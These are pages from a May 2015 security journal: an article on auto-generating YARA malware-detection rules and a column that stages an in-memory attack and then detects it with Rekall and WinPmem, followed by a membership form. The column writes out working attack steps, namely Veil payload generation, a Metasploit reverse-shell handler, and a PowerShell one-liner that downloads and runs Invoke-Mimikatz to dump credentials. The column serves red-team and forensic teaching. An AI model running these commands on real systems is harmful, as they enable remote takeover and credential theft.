Figure 1 Example YARA rule

Understanding enough about the patterns in a malicious file

to be able to manually extract seemingly unique patterns to
create a rule can take significant time and manual analysis. It
may also require an experienced eye to discern the uniqueness of some of the identified patterns and whether those are
unique enough to the files for which you are trying to signature. However, automated tools can help alleviate this issue by
providing a way to quickly create YARA rules using a collection of samples that are known to be related.
One of the best and easiest ways to begin using YARA is to
employ one of several automated tools available from security professionals who have created and provided them to
the public. These tools have been built with varying logic but
generate YARA rules via analysis of multiple known, malicious samples. For example, providing these tools with four
malware samples of the Zeus Trojan will produce a rule that
should find samples that are similar to the provided files with
a reasonable expectation that the newly discovered ones are
also samples of the Zeus Trojan. The tools compare the files
and collect pattern similarities that it will then use to create the rule. In some instances they will also discard known
commonalities associated with the particular file type. Using
these tools, most of which are written using the Python pro3 Victor Alvarez, Welcome to YARAs documentation!, Read the Docs, last modified
February 10, 2015. http://yara.readthedocs.org/en/v3.3.0/.
4 Ibid.

gramming language, even further decreases the knowledge

barrier required to use YARA.
The first tool, called YaraGenerator, was produced by Chris
Clark and can be found at his Github site or dedicated website.5 This tool searches for common strings amongst the provided samples and can account for different file types. A common usage might look like the example in figure 2,6 assuming
Python is installed, which produces a rule that can be seen
in figure 3.
rule Win_Trojan_APT_APT1_Greencat : APT
author = Chris Clark
date = 2013-06-04
description = APT Trojan Comment Crew
hash0 = 57e79f7df13c0cb01910d0c688fcd296
hash1 = 871cc547feb9dbec0285321068e392b8
hash2 = 6570163cd34454b3d1476c134d44b9d9
sample_filetype = exe
yaragenerator = https://github.com/Xen0ph0n/
$string0 = Ramdisk
$string1 = Cache-Control:max-age
$string2 = YYSSSSS
$string3 = \\cmd.exe
$string4 = Translation wide
$string5 = CD-ROM
$string6 = Mozilla/5.0
$string7 = Volume on this computer:
$string8 = pidrun
$string9 = 3@YAXPAX@Z
$string10 = SMAgent.exe wide
$string11 = Shell started successfully
$string12 = Content-Length: %d
$string13 = t4j SV3
$string14 = Program started
$string15 = Started already,
$string16 = SoundMAX service agent wide
16 of them
Figure 3 YARA rule from YaraGenerator

5 Chris Clark, Welcome to the YaraGenerator Project, YaraGenerator, accessed April

10, 2015, https://yaragenerator.com/; YaraGenerator, Github, last modified August
29, 2013, https://github.com/Xen0ph0n/yaragenerator.
6 Examples adapted from https://yaragenerator.com/.

python yaraGenerator.py ../greencat/ -r Win_Trojan_APT1_GreenCat -a Chris Clark -d APT Trojan

Comment Panda -t APT -f exe
[+] Generating Yara Rule Win_Trojan_APT1_GreenCat from files located in: ../greencat/
[+] Yara Rule Generated: Win_Trojan_APT1_GreenCat.yar
[+] Files Examined: [871cc547feb9dbec0285321068e392b8, 6570163cd34454b3d1476c134d44b9d9,
[+] Author Credited: Chris Clark
[+] Rule Description: APT Trojan Comment Panda
[+] Rule Tags: APT
[+] YaraGenerator (C) 2013 Chris@xenosec.org https://github.com/Xen0ph0n/YaraGenerator
Figure 2 Example use of YaraGenerator
May 2015 | ISSA Journal 39

Starting with YARA the Automated Way | Jordan Berry

This rule can then be tested using YARA from the command-line (with -r to instruct YARA to search recursively
through all files in the folder and sub-folders):
yara r Win_Trojan_APT1_GreenCat.yar ./
It is important to have a collection of samples, both malicious
and benign, to test new rules for potential false positives.
Another tool that is similar to YaraGenerator is a tool created by Florian Roth called yarGen.7 The primary advantage to
this tool is that it uses a very large database of strings from
common and benign software, which are removed from the
final YARA rule(s). This provides a reasonable expectation
that strings found in the rules and that this tool produces are
at least not also found in a large collection of common benign
files. He explains some of the methodology behind the tool
in his blog post and provides two great examples. His prime
motivator for creating the tool was to help people avoid rules
that create too many false positives while attempting to write
a rule that is also sufficiently generic to detect samples beyond just the ones provided to the tool. He also recommends
manually fine-tuning the rule and associated logic to ensure
its effectiveness.
These open source tools are meant to provide a quick and easy
way to develop YARA rules on the fly, but they do have limitations. These two tools are only capable of generating rules
based on strings found in the files and not hexadecimal binary patterns, which YARA is capable of. This is a drawback
because strings are easily mutable in subsequent samples of
the same malware family. In addition, packers also serve the
same purpose for malicious threat actors by compressing and
obfuscating the actual malware.8 These types of techniques
can hinder static malware analysis (i.e., gathering strings
from a binary).9 At least one tool does exist to find common
binary patterns in files,10 but its results are mixed at best and
do not appear to account for similar binary patterns found
across all executable files. Manual review by someone with
malware analysis skills is obviously most ideal for high fidelity YARA rules. So, while you brush up on your skills and
teach yourself more advanced malware analysis techniques
with some of the best instructional guides,11 12 you can use
these tools to get you off the ground.

7 Florian Roth, How to Write Simple but Sound Yara Rules, bsk consulting (blog),
February 15, 2015, https://www.bsk-consulting.de/2015/02/16/write-simple-soundyara-rules/; Florian Roth, yarGen, Github, last modified February 11, 2015, https://
8 Michael Sikorski and Andrew Honig, Practical Malware Analysis: The Hands-On
Guide to Dissecting Malicious Software, (San Francisco: No Starch Press, 2012), 13.
9 Ibid.
10 Joxean Koret, Extracting binary patterns in malware sets and generating Yara rules,
Unintended Results (blog), April 29, 2012, http://joxeankoret.com/blog/2012/04/29/
11 Michael Sikorski and Andrew Honig, Practical Malware Analysis: The Hands-On
Guide to Dissecting Malicious Software, (San Francisco: No Starch Press, 2012).
12 Michael Ligh, Steven Adair, Blake Harstein, and Matthew Richard, Malware
Analysts Cookbook and DVD: Tools and Techniques For Fighting Malicious Code,
(Indianapolis: Wiley Publishing, Inc., 2011).

40 ISSA Journal | May 2015

Im not a malware researcher, so how can I use

Aside from malware analysts and researchers, YARA may
appear to provide less utility for the rest of the security community, particularly considering that having a dedicated
malware researcher may be a luxury for most organizations.
However, its utility is actually far-reaching and constantly
Organizations regularly share information on cybersecurity
threats through formalized Information Sharing and Analysis Centers (ISACs) and other arrangements. The specific
information shared can vary broadly, but in some instances it could include malware samples. This scenario would
provide an excellent opportunity to quickly use the known
bad samples to develop a YARA rule and scan the organizations endpoints and historical incident samples. The agility
of this approach could be especially valuable in high-pressure
situations, such as a major breach occurs and organizations
within the same industry are quickly trying to search for indicators that may have been shared with them by the ISAC
or through another pre-existing sharing relationship. The
US government even recently announced an executive order
aimed at cybersecurity information sharing,13 so the need for
organizations to leverage shared threat intelligence will likely
continue to grow.
In addition to quick response, an organization can also use
YARA to regularly scan the endpoints within its network.
In late 2014, Ricardo Dias published a paper through SANS
that explained in great detail the benefits of using YARA to
not only find similar malware samples but also as an enterprise-wide scan engine to detect malicious files at an organizations endpoints.14 One of his primary goals of the research
was to help organizations deal with the abundance of malicious indicators available today.
YARA is also capable of scanning processes currently running
in memory, which can be useful for checking process mutexes. These are sometimes unique and can be used to identify
malware families.15 Leveraging YARA rules to search for the
indicators that companies may regularly collect from open
source reports (sometimes the YARA rules are even provided by security companies) or purchase from security vendors
can be an incredibly valuable tool. Organizations regularly
perform similar actions with network-based indicators derived from these sources (i.e., searching logs, deploying new
Snort rules, etc.) and with YARA are now able to deploy that
same type of pro-active search. There are even some sharing
groups that exchange YARA rules, like the newly established
yararules.com. This type of exchange could also help to provide a baseline of rules to generically detect malicious files as
13 Barack Obama, Promoting Private Sector Cybersecurity Information Sharing,
Executive Order 13691, February 20, 2015, http://fas.org/irp/offdocs/eo/eo-13691.
14 Ricardo Dias, Intelligence-Driven Incident Response with YARA, SANS Institute
InfoSec Reading Room, http://www.sans.org/reading-room/whitepapers/forensics/
15 Ibid, 12.

Starting with YARA the Automated Way | Jordan Berry

opposed to rules specific to a particular malware family. The
community is growing for YARA, but it is still in its infancy
compared to the maturity of its open source network peer,

Symantecs CEO famously announced in mid-2014 that antivirus is dead, lending credence to the growing suspicion
that hackers are more consistently evading standard antivirus detections.16 The need for better and more proactive
methods for finding malicious activity has become apparent,
and YARA is a great way to help bridge that gap. Using the
open source tools described above, analysts can easily create
YARA rules and quickly begin scanning files. In addition to
its ease of use, YARA also makes for an excellent endpoint
scanning engine since it can scan subsequent files that are
written to disk, perhaps after a compromise occurs, as well as
processes running in memory. The tool is flexible and, most
importantly, it is a freely available, open source tool that has
changed how the security community operates.

Alvarez, Victor. Welcome to YARAs documentation! Read
the Docs. Last modified February 10, 2015. http://yara.readthedocs.org/en/v3.3.0/.
Clark, Chris. YaraGenerator. Github. Last modified August
29, 2013. https://github.com/Xen0ph0n/yaragenerator.
Dias, Ricardo. Intelligence-Driven Incident Response
with YARA. SANS Institute InfoSec Reading Room. http://
Documents. Snort. Accessed April 19, 2015. https://www.
Koret, Joxean. Extracting binary patterns in malware sets and
generating Yara rules. Unintended Results (blog). April 29,
Ligh, Michael, Steven Adair, Blake Harstein, and Matthew
Richard. Malware Analysts Cookbook and DVD: Tools and
Techniques For Fighting Malicious Code. Indianapolis: Wiley
Publishing, Inc., 2011.
Obama, Barack. Promoting Private Sector Cybersecurity Information Sharing. Executive Order 13691. February 20, 2015.
Roth, Florian. yarGen. Github. Last modified February 11,
2015. https://github.com/Neo23x0/yarGen/.
Sikorski, Michael, and Andrew Honig. Practical Malware
Analysis: The Hands-On Guide to Dissecting Malicious Software. San Francisco: No Starch Press, 2012.
Yadron, Danny. Symantec Develops New Attack on Cyberhacking. Wall Street Journal. May 4, 2014. http://www.wsj.
16 Danny Yadron, Symantec Develops New Attack on Cyberhacking, Wall Street
Journal, May 4, 2014, http://www.wsj.com/articles/SB10001424052702303417104579

About the Author

Jordan Berry is currently a threat intelligence

analyst for FireEye, Inc., on the Intelligence
team based out of Washington, DC. He
spends his time researching the latest activities from cyber threat groups. He obtained his
BS from Mississippi State University in Electrical Engineering and was a recipient of the
National Science Foundations Scholarship for Service scholarship. He may be reached at berry.jordanb@gmail.com.

ISSA Journal 2015 Calendar

Past Issues click the download link:


Legal and Regulatory Issues


The State of Cybersecurity


Physical Security


Security Architecture / Security Management


Infosec Tools


The Internet of Things


Malware and How to Deal with It?

Editorial Deadline 5/22/15



Editorial Deadline 6/22/15


Academia and Research

Editorial Deadline 7/22/15


Infosec Career Path

Editorial Deadline 8/22/15


Social Media and Security

Editorial Deadline 9/22/15


Best of 2015
You are invited to share your expertise with the association and submit an
article. Published authors are eligible for CPE credits.
For theme descriptions, visit www.issa.org/?CallforArticles.

May 2015 | ISSA Journal 41



Attack & Detection:

Hunting In-Memory Adversaries
with Rekall and WinPmem
By Russ McRee ISSA Senior Member, Puget Sound (Seattle) Chapter

Any Python-enable system if running from source
There is a standalone exe with all dependencies met, available
for Windows.

his month represents our annual infosec tools edition, and Ive got a full scenario queued up for you.
Were running with a vignette based in absolute reality. When your organizations are attacked (you already have
been) and a compromise occurs (assume it will), it may well
follow a script (pun intended) something like this. The most
important lesson to be learned here is how to assess attacks of
this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011, we invited
readers to embrace memory analysis as an absolutely critical
capability for incident responders and forensic analysts. This
month, in a similar vein, well explore Rekall. The projects
point man, Michael Cohen, branched Volatility, aka the scudette branch, in December 2011 as a technology preview. In
December 2013, it was completely forked and became Rekall
to allow inclusion in GRR1 as well as methods for memory
acquisition, and to advance the state of the art in memory
analysis.2 April, 2, 2015, saw the release of Rekall 1.3.1 Dammastock,3 named for Dammastock Mountain in the Swiss
Alps. An update release to 1.3.2 was posted to GitHub April
26, 2015.
Michael provided personal insight into his process and philosophy, which Ill share verbatim in part here:
For me memory analysis is such an exciting field. As a field it
is wedged between so many other disciplines such as reverse
engineering, operating systems, data structures, and algorithms. Rekall as a framework requires expertise in all these
fields and more. It is exciting for me to put memory analysis
to use in new ways. When we first started experimenting with
live analysis, I was surprised how reliable and stable this was.
No need to take and manage large memory images all the
1 https://github.com/google/grr.
2 http://www.rekall-forensic.com/about.html.
3 https://github.com/google/rekall/releases/tag/v1.3.2.

42 ISSA Journal | May 2015

time. The best part was that we could just run remote analysis
for triage using a tool like GRRso now we could run the
analysis not on one machine at the time but several thousand
at a time! Then, when we added virtual machine introspection support, we could run memory analysis on the VM guest
from outside without any special support in the hypervisor
and it just worked!
While we wont cover GRR here, recognize that the ability to
conduct live memory analysis across thousands of machines,
physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators.

Scenario overview
We start with the assertion that the red teams attack graph is
the blue teams kill chain.
Per Captain Obvious: The better defenders (blue team) understand attacker methods (red team), the more able they
are to defend against them. Conversely, red teamers who are
aware of blue team detection and analysis tactics, the more
readily they can evade them.
As we peel back this scenario, well explore both sides of the
fight; Ill walk you through the entire process including attack and detection. Ill evade and exfiltrate, then detect and
As you might imagine the attack starts with a targeted phishing attack. We wont linger here; youve all seen the like. The
key take away for red and blue: the more enticing the lure,
the more numerous the bites. Surveys promising rewards are
particularly successful; everyone wants to win something,
and sadly, many are willing to click and execute payloads to
achieve their goal. These folks are the red teams best friend
and the blue teams bane. Once the payload is delivered and
executed for an initial foothold, the focus moves to escalation
of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts
(credentials, hashes), causing effect becomes trivial and often leads to total compromise. For this exercise, well assume
weve compromised a user who is running his system with
administrative privileges, which sadly remains all too common. With some great PowerShell scripts and the omniscient

toolsmith Hunting In-Memory Adversaries with Rekall and WinPmem | Russ McRee

Figure 1 Veil payload options

and almighty Mimikatz, the victims network can be your

playground. Ill show you how.

Keep in mind, Im going into some detail here regarding attack methods so we can then play them back from the defenders perspective with Rekall, WinPmem, and VolDiff.
All good phishing attacks need a great payload, and one of the
best ways to ensure you deliver one is Christopher Truncers
(@ChrisTruncer) Veil-Evasion,4 part of the Veil-Framework.
The most important aspect of Veil use is creating a payload
that evades anti-malware detection. This limits attack awareness for the monitoring and incident response teams as no
initial alerts are generated. While the payload does land on
the victims file system, its not likely to end up quarantined or
deleted, happily delivering its expected functionality.
I installed Veil-Evasion on my Kali VM easily:
1. apt-get install veil
2. cd /usr/share/veil-evasion/setup
3. ./setup.sh
Thereafter, to run Veil you need only execute veil-evasion.
Veil includes 35 payloads at present; choose list to review
them. I chose #17, powershell/meterpreter/rev_https as seen in
figure 1.
I ran set LHOST for my Kali server acting as
the payload handler, followed by info to confirm, and generate
to create the payload. I named the payload toolsmith, which
Veil saved as toolsmith.bat. If you happened to view the .bat
file in a text editor, youd see nothing other than what appears
to be a reasonably innocuous PowerShell script with a large
Base64 string. Many a responder would potentially roll right
past the file as part of normal PowerShell administration. In
a real-world penetration test, this would be the payload deliv4 https://www.veil-framework.com/framework/veil-evasion/.

Figure 2 Victim Meterpreter session

ered via spear phishing, ideally to personnel known to have

privileged access to key terrain.
This step assumes our victim has executed our payload in a
time period of our choosing. Obviously set up your handlers
before sending your phishing mail. I will not discuss persistence here for brevitys sake but imagine that an attacker
will take steps to ensure continued access. Read Fishnet Securitys How-To: Post-Ex Persistence Scripting with PowerSploit & Veil5 as a great primer on these methods.
Again, on my Kali system I set up a handler for the shell access created by the Veil payload.
1. cd /opt/metasploit/app/
2. msfconsole
3. use exploit/multi/handler
4. set payload windows/meterpreter/reverse_
5. set lhost
6. set lport 8443
7. set exitonsession false
8. run exploit j
At this point back returns you to the root msf > prompt.
When the victim executes toolsmith.bat, the handler reacts
with a Meterpreter session as seen in figure 2.
Use sessions l to list sessions available, use sessions -i
2 to use the session seen in figure 2.
I now have an interactive shell with the victim system and
have some options. As Im trying to exemplify running almost entirely in victim memory, I opted to not copy additional scripts to the victim; but if I did so it would be another
5 https://www.fishnetsecurity.com/6labs/blog/how-post-ex-persistence-scriptingpowersploit-veil.

May 2015 | ISSA Journal 43

toolsmith Hunting In-Memory Adversaries with Rekall and WinPmem | Russ McRee
meterpreter_output.txt confirms the win. Figure 3
displays the results.
If I had pivoted from this system and moved to a
heavily used system such as a terminal server or an
Exchange server, I may have acquired domain admin credentials as well. Id certainly have acquired
local admin credentials, and no one ever uses the
same local admin credentials across multiple systems, right? ;-)
Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took
place in memory. How do we spot such behavior and
defend against it? Time for Rekall and WinPmem,
because they can remember it for you wholesale!

Rekall preparation
Installing Rekall on Windows is as easy as grabbing
the installer from GitHub, 1.3.2 as this is written.
Figure 3 Invoke-Mimikatz for the win!

PowerShell script to make use of Joe Bialeks (@JosephBialek)

Invoke-Mimikatz,6 which leverages Benjamin Delpys (@gentilkiwi) Mimikatz. Instead I pulled down Joes script directly
from GitHub and ran it directly in memory, no file system
To do so from the Meterpreter session, I executed the following.
1. shell
2. getsystem (if the user is running as admin, youll
see got system)
3. spool /root/meterpreter_output.txt
4. powershell.exe iex (New-Object Net.WebClient).DownloadString(https://raw.GitHubusercontent.com/mattifestation/PowerSploit/
master/Exfiltration/Invoke-Mimikatz.ps1);Invoke-Mimikatz -DumpCreds
A brief explanation here. The shell command spawns a command prompt on the victim system; getsystem ensures that
youre running as local system (NT AUTHORITY\SYSTEM),
which is important when youre using Joes script to leverage
Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again our
goal here is to conduct activity such as dumping credentials
without ever writing the Mimikatz binary to the victim file
system. Our last line does so in an even craftier manner. To
prevent the need to write output to the victim file system, I
used the spool command to write all content back to a text file
on my Kali system. I used PowerShells ability to read in Joes
script directly from GitHub into memory and poach credentials accordingly. Back on my Kali system a review of /root/
6 https://github.com/clymb3r/PowerShell.

44 ISSA Journal | May 2015

On x64 systems it will install to C:\Program Files\

Rekall; you can add this to your PATH so you can
run Rekall from anywhere.
WinPmem 1.6.2 is the current stable version and WinPmem
2.0 Alpha is the development release. Both are included on
the project GitHub site. Having an imager embedded with the
project is a major benefit, and its developed against with a
Running WinPmem for live response is as simple as winpmem.exe l to load the driver so you launch Rekall to mount
the winpmem device with rekal -f \\.\pmem (this cannot
be changed) for live memory analysis.
Rekall use
There are a few ways to go about using Rekall. You can take a
full memory image locally with WinPmem or remotely with
GRR and bring the image back to your analysis workstation.
You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from
Volatility. On the Windows 7 x64 system I compromised with
the attack described above, I first ran winpmem_1.6.2.exe
compromised.raw and shipped the 4GB memory image to
my workstation. You can simply run rekal which will drop
you into the interactive shell. As an example I ran rekal f
raw, then from the shell ran various plugins. Alternatively
I could have run rekal f D:\forensics\memoryImages\
toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the
most powerful and flexible interface most importantly because it allows session management and storage specific to an
image analysis.7
7 http://www.rekall-forensic.com/docs/Manual/tutorial.html.

toolsmith Hunting In-Memory Adversaries with Rekall and WinPmem | Russ McRee

Figure 4 Rekall netstat plugin shows PowerShell with connections

Suspicious indicator #1
From the interactive shell, I started with the netstat plugin,
as I always do. Might as well see who it talking to whom, yes?
Were treated to the instant results seen in figure 4.
Yep, sure enough we see a connection to our above mentioned
attacker at; the owner is attributed to powershell.exe and the PIDs are 1284 and 2396.
Suspicious indicator #2
With the pstree plugin we can determine the parent PIDs
(PPID) for the PowerShell processes. Whats odd here from a
defenders perspective is that each PowerShell process seen in
the pstree (figure 5) is spawned from cmd.exe. While not at
all conclusive, it is at least intriguing.
Suspicious indicator #3
I used malfind to find hidden or injected code/DLLs and
dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir=/tmp/ I received
feedback on PID 1284 (repeated for 2396), with indications

specific to Trojan:Win32/
Swrort.A. From the MMPC
writeup,8 Trojan:Win32/
Swrort.A is a detection for
files that try to connect
to a remote server. Once
connected, an attacker can
perform malicious routines
such as downloading other
files. They can be installed
from a malicious site
or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers. Hmm,
sound familiar from the attack scenario above? ;-) Note that
the netstat plugin found that powershell.exe was connecting
via 8443 (a different port number).
Suspicious indicator #4
To close the loop on this analysis, I used memdump for a few
key reasons. This plugin dumps all addressable memory in
a process, enumerates the process page tables, writes them
out into an external file, and creates an index file useful for
finding the related virtual address.9 I did so with memdump
pid=2396, dump_dir=/tmp/, ditto for PID 1284. You can
use the .dmp output to scan for malware signatures or other
patterns. One such method is strings keyword searches. Given that we are responding to what we can reasonably assert
is an attack via PowerShell, a keyword-based string search is
definitely in order. I used my favorite context-driven strings
tool and searched for invoke against powershell.exe_2396.
dmp. The results paid immediate dividends; Ive combined to
critical matches in figure 6.
Suspicions confirmed; this box be owned, aargh!
The strings results on the left show the initial execution of the
PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy followed by a slew of
Base64 that is the powershell/meterpreter/rev_https payload.
The strings results on the left show when Invoke-Mimikatz.
ps1 was actually executed.
Four quick steps with Rekall and weve, in essence, reversed
the steps described in the attack phase.
Remember too, we could just as easily have conducted these
same step on a live victim system with the same plugins via
the following:
rekal -f \\.\pmem netstat
rekal -f \\.\pmem pstree
rekal -f \\.\pmem malfind pid=1284, dump_dir=/
rekal -f \\.\pmem memdump pid=2396, dump_dir=/

Figure 5 Rekall pstree plugin shows powershell.exe PPIDs

8 http://www.microsoft.com/security/portal/threat/encyclopedia/entry.
aspx?name=Trojan%3aWin32%2fSwrort.A&threatid=2147630763 - tab=2.
9 http://www.rekall-forensic.com/docs/Manual/Plugins/Windows/WinMemDump.

May 2015 | ISSA Journal 45

toolsmith Hunting In-Memory Adversaries with Rekall and WinPmem | Russ McRee

Figure 6 Strings results for keyword search from memdump output

In conclusion

Cheersuntil next month.

In celebration of the annual infosec tools addition, weve definitely gone a bit hog wild. But because it has been for me, I
have to imagine youll find this level of process and detail useful. Michael and team have done wonderful work with Rekall
and WinPmem. Id love to hear your feedback on your usage,
particularly with regard to close, cooperative efforts between
your red and blue teams. If youre not yet using these tools,
you should be; and I recommend a long, hard look at GRR as
well. Id also like to give more credit where its due. In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They
include Microsofts Mike Fanning, root9bs Travis Lee, and
Laconiclys Billy Rios. Thank you for everything, gentlemen.


Ping me via email or Twitter if you have questions (russ at

holisticinfosec dot org or @holisticinfosec).

Michael Cohen, Rekall/GRR developer and project lead

About the Author

Russ McRee manages the Threat Intelligence & Engineering

team for Microsofts Online Services Security & Compliance
organization. In addition to toolsmith, hes written for numerous other publications, speaks regularly at events such as
DEFCON, Black Hat, and RSA, and is a SANS Internet Storm
Center handler. As an advocate for a holistic approach to the
practice of information assurance Russ maintains holisticinfosec.org. He serves in the Washington State Guard as the
Cybersecurity Advisor to the Washington Military Department.Reach him at russ at holisticinfosec dot org or @holisticinfosec.

Click here for On-Demand Conferences

Continuous Forensic Analytics Issues and Answers
Recorded Live: April 14, 2015

Secure Development Life Cycle for Your Infrastructure

2-Hour Event Recorded Live: Tuesday, March 24, 2015

Cybersecurity New Frontier

2-Hour Event Recorded Live: February 24, 2015

Security Reflections of 2014 & Predictions for 2015

2-Hour Event Recorded Live: January 27, 2015

Dorian Grey & The Net: Social Media Monitoring

2-Hour Event Recorded Live: Tuesday, November 18, 2014


Cybersecurity and Other Horror Stories

2-Hour Event Recorded Live: Tuesday, October 28, 2014

Encryption: The Dark Side: Things to Worry about for 2014

2-Hour Event Recorded Live: Tuesday, September 30, 2014

Cyber Analysis Tools: The State of the Union

2-Hour Event Recorded Live: Tuesday, August 26, 2014

Global Cybersecurity Outlook: Legislative, Regulatory

and Policy Landscapes
2-Hour Event Recorded Live: Tuesday, June 24, 2014

Breach Report: How Do You Utilize It?

2-Hour Event Recorded Live: Tuesday, May 27, 2014

A Wealth of Resources for the Information Security Professional www.ISSA.org

46 ISSA Journal | May 2015

ISSA Membership Application

Return completed form with payment. * Required Entries
* Name _____________________________________________________

Certifications ___________________________________

* Employer ___________________________________________________

* Email ________________________________________

Job Title ___________________________________________________

* Preferred address for receiving mailing (choose one): n Home n Professional

* Preferred phone number for receiving calls: (choose one)

n Home n Mobile n Professional

* Address 1 __________________________________________________

* Phone ________________________________________

Address 2 __________________________________________________

Fax _________________________________________

* City ________________________________ State/Province ___________

* Country ____________ * Zip/Postal Code _____________

In order to obtain personal information and account access over the phone, ISSA Member services will ask your provided security question.
* Security Question:_____________________________________________

* Security Answer: ________________________________

* Only Online Journal: n Yes n No Annual general membership dues of $95 per year include $28 for a one-year subscription to the ISSA Journal.
ISSA Privacy Statement: The ISSA privacy statement is included in the Organization Manual, and is provided for your review at www.issa.org/?PrivacyNotice.
To enable us to better serve your needs, please complete the following
Your Industry (Select only ONE number from below and enter here) _________
A. Advertising/Marketing
J. Engineering/Construction/Architecture S. Manufacturing/Chemical
B. Aerospace
K. Financial/Banking/Accounting
T. Medicine/Healthcare/Pharm.
C. Communications
L. Government/Military
U. Real Estate
D. Computer Services
M. Hospitality/Entertainment/Travel
V. Retail/Wholesale/Distribution
E. Security
N. Information Technologies
W. Transportation/Automobiles
F. Consulting
O. Insurance
X. Energy/Utility/Gas/Electric/Water
G. Education
P. Internet/ISP/Web
Y. Other ___________________
H. Computer Tech-hard/software Q. Media/Publishing
I. Electronics

Membership Fees
Membership Categories (descriptions on back)
General Membership: $95 (USD) plus chapter dues
2-Year: $185 (USD); 3-Year: $275 (USD); 5-Year: $440 (USD)
Government Organizational: $90 (USD) plus chapter dues
Student Membership: $30 (USD) plus chapter dues
CISO Executive Membership: $995 (USD) plus chapter dues

R. Legal

Your Primary Job Title (Select only ONE number from below and enter here) _________
1. Corporate Manager/CIO/CSO/CISO
9. Operations Manager
17. Engineer
2. IS Manager/Director
10. Operations Specialist
18. Auditor
3. Database Manager, DBA
11. LAN/Network Manager
19. President/Owner/Partner
4. Database Specialist, Data Administrator 12. LAN/Network Specialist
21. Financial Manager
5. Application Manager
13. Security Specialist
22. Administrator
6. Applications Specialist
14. Contingency Planner
23. Educator
7. Systems/Tech Support Manager
15. Sales/Marketing Specialist
24. Other________________
8. Systems Programmer/Tech Support
16. Independent Consultant
Your Areas of Expertise (List all that apply) ______________________________________
A. Security Mgmt Practices
E. Security Architecture
I. Operations Security
B. Business Continuity/Disaster Recovery F. Applications/Systems Development J. Physical Security
C Network Security
G. Law/Investigations/Ethics
K. Telecommunications Security
D. Access Control Systems/Methods
H. Encryption
L. Computer Forensics

ISSA Code of Ethics

The primary goal of the Information Systems Security Association, Inc. (ISSA) is to promote practices that
will ensure the confidentiality, integrity, and availability of organizational information resources. To achieve
this goal, members of the Association must reflect the highest standards of ethical conduct. Therefore, ISSA
has established the following Code of Ethics and requires its observance as a prerequisite for continued
membership and affiliation with the Association. As an applicant for membership and as a member of ISSA, I
have in the past and will in the future:
Perform all professional activities and duties in accordance with all applicable laws and the highest
ethical principles;
Promote generally accepted information security current best practices and standards;
Maintain appropriate confidentiality of proprietary or otherwise sensitive information encountered in the
course of professional activities;
Discharge professional responsibilities with diligence and honesty;
Refrain from any activities which might constitute a conflict of interest or otherwise damage the
reputation of employers, the information security profession, or the Association; and
Not intentionally injure or impugn the professional reputation of practice of colleagues, clients, or

Signature __________________________________________ Date ______________

*Membership Category _______________________________

(See above)

*Chapter(s) _______________________________________
(Required within 50 miles of local chapter - list on reverse)

Referring Member & Chapter __________________________

ISSA Member Dues (on reverse)

$ _______________

Chapter Dues x Years of Membership

$ _______________

Additional Chapter Dues

$ _______________

Total Membership Dues

$ _______________

ISSA Foundation Donation

$ _______________

(on reverse)

(if joining multiple chapters - optional)


A tax-deductible contribution, as allowed by US tax code, can be

made in addition to your ISSA Membership Payment. For more information on the foundation and its programs, visit www.issaef.org.

Total (dues + ISSA Foundation)

$ _______________

Print out and mail or fax form to:

ISSA Headquarters
9220 SW Barbur Blvd #119-333, Portland, OR 97219
Fax +1 (206) 299-3366
Phone +1 (206) 388-4584 www.issa.org
You may download the form and submit it electronically as an email
attachment. You will need an email account to send it.

ISSA Member Application 2/14

Risk Radar: Real-World Rogue AV | Ken Dunham

Please check the following:

Membership Categories and Annual Dues

General Membership: $95 (USD) plus chapter dues

Professionals who have as their primary responsibility information systems security in the private
or public sector, or professionals who supply information systems security consulting services to
the private or public sector; or IS Auditors, or IS professionals who have as one of their primary
responsibilities information systems security in the private or public sector; Educators, attorneys
and law enforcement officers having a vested interest in information security; or Professionals with
primary responsibility for marketing or supplying security equipment or products. Multi-year memberships for General Members, are as follows (plus chapter dues each year): 2-Year: $185; 3-Year:
$275; 5-Year: $440.

Government Organizational: $90 (USD) plus chapter dues

This membership offers government agencies the opportunity to purchase membership for an employee. This membership category belongs to the employer and can be transferred as reassignments occur. When an employee is assigned to this membership, he or she has all of the rights and
privileges of a General Member.

Student Membership: $30 (USD) plus chapter dues

Student members are full-time students in an accredited institution of higher learning. This membership class carries the same privileges as that of a General Member except that Student Members
may not vote on Association matters or hold an office on the ISSA International Board. There is no
restriction against students forming a student chapter.

CISO Executive Membership: $995 (USD) plus chapter dues

The role of information security executives continues to be defined and redefined as the integration
of business and technology evolves. While these new positions gain more authority and responsibility, peers must form a collaborative environment to foster knowledge and influence that will
help shape the profession. ISSA recognizes this need and has created the exclusive CISO Executive Membership program to give executives an environment to achieve mutual success. For more
information about CISO Executive Membership and required membership criteria, please visit the
CISO website http://ciso.issa.org.

Credit Card Information

Choose one: n Visa

n MasterCard

n American Express

Card # ___________________________________ Exp. Date ____________

Signature ________________________________ CVV code _____________

ISSA Chapters & Annual Dues

At-Large ............................ 25
Asia Pacific
Chennai............................... 0
Hong Kong .......................... 0
Philippines ........................ 20
Singapore.......................... 10
Sri Lanka ........................... 10
Sydney ................................ 0
Tokyo ................................ 30
Victorian.............................. 0
Europe, Middle East
& Africa
Brussels European ............ 40
Egypt ................................... 0
France ................................. 0
Irish..................................... 0
Israel ................................... 0
Italy ................................... 65
Netherlands ....................... 30
Nordic ................................. 0
Poland................................. 0
Qatar ................................... 0
Romania .............................. 0
Saudi Arabia........................ 0
Germany............................ 30

Spain................................. 60
Switzerland........................ 80
Turkey ............................... 30
UK ..................................... 0
Latin America
Argentina............................. 0
Barbados ........................... 25
Brasil................................... 5
Chile ................................. 30
Colombia ............................ 5
Ecuador ............................... 0
Lima, Per........................... 5
Puerto Rico ....................... 35
Uruguay .............................. 0
North America
Alamo................................ 20
Alberta............................... 25
Amarillo ............................ 25
ArkLaTex ............................. 0
Baltimore........................... 20
